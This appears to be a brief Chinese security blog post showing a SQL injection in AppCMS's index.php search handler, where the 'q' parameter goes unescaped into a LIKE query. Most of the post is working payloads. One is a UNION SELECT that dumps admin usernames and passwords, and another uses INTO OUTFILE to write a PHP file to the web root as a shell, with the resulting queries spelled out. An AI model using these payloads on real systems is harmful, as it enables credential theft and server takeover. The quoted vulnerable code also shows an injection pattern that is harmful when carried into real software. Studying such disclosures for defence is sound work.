index.php
if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) { $str = ''; $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15"; $app_list = $dbm ->query($sql); if (count($app_list['list']) > 0) { foreach ($app_list['list'] as $k => $v){ $app_list['list'][$k]['app_title'] = helper :: utf8_substr($v['app_title'], 0, 20); } echo json_encode($app_list['list']); exit; } else { exit; } }
$_GET['q']直接带入查询
构造:
q=1%'union select 1,uname,upass from appcms_admin_list %23
1%’闭合前面的’% 使like语句完整 #注释掉后面语句 联合查询出数据
Sql语句变成
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list
写shell:
q=1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php' %23
语句变成:
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php'
作者:p0
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论